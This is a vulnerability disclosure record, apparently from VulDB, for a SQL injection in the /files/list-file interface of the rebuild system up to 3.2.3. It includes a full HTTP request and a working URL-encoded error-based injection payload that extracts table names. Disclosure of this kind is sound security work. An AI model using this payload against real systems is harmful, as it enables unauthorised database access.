| Title | SQL injection vulnerability exists in the /files/list-file interface of the rebuild system |
|---|
| Description | Suggested description:
sql injection vulnerability exists in rebuild <=3.2.3.
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
Vulnerability Type:
SQLi
Vendor of Product:
https://github.com/getrebuild/rebuild
Affected Product Code Base:
<=3.2.3
Affected Component:
/files/list-file
Attack Type:
Remote
Request message:
```
GET /files/list-file?entry=1&sort=&q=1&pageNo=1&pageSize=40&_=1679238611579 HTTP/1.1
Host: 192.168.0.102:18080
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Referer: http://192.168.0.102:18080/files/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rb.lastFilesPath=attachment; _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679238611.9.1.1679238613.0.0.0
Connection: close
```
payload:
%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)+and%201%20=%20?%20--+ |
|---|
| Source | ⚠️ https://github.com/getrebuild/rebuild/issues/598 |
|---|
| User | Mechoy (UID 41579) |
|---|
| Submission | 03/19/2023 18:27 (3 years ago) |
|---|
| Moderation | 03/23/2023 19:44 (4 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223743 [Rebuild up to 3.2.3 /files/list-file sql injection] |
|---|
| Points | 20 |
|---|